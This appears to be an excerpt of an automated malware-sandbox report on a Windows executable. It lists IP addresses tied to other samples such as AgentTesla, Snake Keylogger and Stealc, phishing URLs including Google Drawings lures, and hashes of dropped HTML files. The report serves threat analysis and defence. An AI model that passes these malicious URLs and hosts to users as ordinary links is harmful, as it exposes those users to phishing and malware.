                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                    • 104.17.24.14
                                                                                                                                                                                                                                                    DHH-ASSISMBKT-20242005.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                    • 212.44.102.65
                                                                                                                                                                                                                                                    a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    x607DB0i08.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.75
                                                                                                                                                                                                                                                    demand_rpkb_060923.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                    • 212.44.101.105
                                                                                                                                                                                                                                                    CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.57
                                                                                                                                                                                                                                                    PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • 212.44.102.57
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4Avis de virement.10.28.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    Jonathangodber October 2024.pdfGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    https://abre.ai/lmHCGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para)Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    October 25, 2024_SAL_RefIyNURVhUTlVNUkFORE9NMTAjIw==.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    https://www.google.mx/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Biw.%C2%ADgc%C2%ADrvn%C2%ADm0.%C2%ADza%C2%AD.c%E2%80%8Bo%C2%ADm%2Ffylee%2Fimages%2Fsf_rand_string_mixed(24)/toto@dgtresor.gouv.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                    • 52.149.20.212
                                                                                                                                                                                                                                                    • 40.69.42.241
                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adhttps://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    z74fBF2ObiS1g87mbS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eMarkus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para)Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Bill_Of _Lading.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    IGNM2810202400017701_270620240801_546001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    https://filerit.com/pi-240924.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    JVLkkfzSKW.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19audiosrv.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    audiosrv.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    yolo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    Markus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    JVLkkfzSKW.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    X9d3758tok.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    KMfWqiiMu0.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    hwWxZRwpeL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):795
                                                                                                                                                                                                                                                    Entropy (8bit):5.215720572741232
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:hYYIzDI8JRA3ZsjNQCRtgoLY95MI5634Vsk:rqPj2CZLY5Mm63E
                                                                                                                                                                                                                                                    MD5:5D8D79C3CB9AF023240B1BE6F5057AAA
                                                                                                                                                                                                                                                    SHA1:DF22980677B134E83D878893F7C7984E0D78A240
                                                                                                                                                                                                                                                    SHA-256:E8B101A7C7F64AAD528CC734513CBEB02243C0AF37930DC0F3239749CFF184B6
                                                                                                                                                                                                                                                    SHA-512:66F432B622CEE0BCC06CBC0F833DE1471EA36C295B4CD93EB848D97E69C2252ACD2FC8972DB51EA35475A424F4D6CB5001325525FB04F71B8704EB24DE1C4008
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 301 Moved Permanently..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>.<h2 style="margin-top:20px;font-size: 30px;">Moved Permanently..</h2>.<p>The document has been permanently moved.</p>.</div></div></body></html>.
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (8047)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56985
                                                                                                                                                                                                                                                    Entropy (8bit):5.380924866576166
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:PyMapcrHsCNwn1d0kelTa1uJ8+C7d7cjmZ2clnlZ+/Y:Pq8wnSjq2clnlZCY
                                                                                                                                                                                                                                                    MD5:47F0F1D21C5A40DBAF883F186B1EFC9C
                                                                                                                                                                                                                                                    SHA1:E066A383D291E94AD1ABD45A59FE8DD671F76D1E
                                                                                                                                                                                                                                                    SHA-256:D9B6C8BB841678B66D95FD942CEF7E0EDA384D687DBA8E8D6D53382BECEC1E86
                                                                                                                                                                                                                                                    SHA-512:35413EF81F8C021AE5398DCCA5E6F9FF365AB77CE253753D1235F5752ABFA6D050363EDD870598A2F52598D39D4DE2F156FF712F150ECDC46A4F5DC6EEF73824
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website
                                                                                                                                                                                                                                                    Process:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):795
                                                                                                                                                                                                                                                    Entropy (8bit):5.215720572741232
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:hYYIzDI8JRA3ZsjNQCRtgoLY95MI5634Vsk:rqPj2CZLY5Mm63E
                                                                                                                                                                                                                                                    MD5:5D8D79C3CB9AF023240B1BE6F5057AAA
                                                                                                                                                                                                                                                    SHA1:DF22980677B134E83D878893F7C7984E0D78A240
                                                                                                                                                                                                                                                    SHA-256:E8B101A7C7F64AAD528CC734513CBEB02243C0AF37930DC0F3239749CFF184B6
                                                                                                                                                                                                                                                    SHA-512:66F432B622CEE0BCC06CBC0F833DE1471EA36C295B4CD93EB848D97E69C2252ACD2FC8972DB51EA35475A424F4D6CB5001325525FB04F71B8704EB24DE1C4008
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 301 Moved Permanently..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>.<h2 style="margin-top:20px;font-size: 30px;">Moved Permanently..</h2>.<p>The document has been permanently moved.</p>.</div></div></body></html>.
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):276480
                                                                                                                                                                                                                                                    Entropy (8bit):6.916407926188135
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:uWmLkxdzKx1Ysq0B1GBsW+iE7UAWDQVO9Ez94CaGQ2/DJ0O:uW5zKx1Ysq21Y+MDsaGR
                                                                                                                                                                                                                                                    MD5:09F58DF8A3560E048BC1288D1720C35B
                                                                                                                                                                                                                                                    SHA1:FE0CEE5DEFEB901D0239195590ABC34679130B7E
                                                                                                                                                                                                                                                    SHA-256:52ACBB9F979A865750B4036CC025AE3F2F92077C7125C8464AA550942D11CD64
                                                                                                                                                                                                                                                    SHA-512:736F8F8DC2AA7B32DBC8E0C98CF0571A7B3A2B7BE1326197979CDFC38D76EA944BE825D599C4DDA74E9625208AC860576BDDD646048CEEDC99C5A1782B8ED021
                                                                                                                                                                                                                                                    Malicious:false
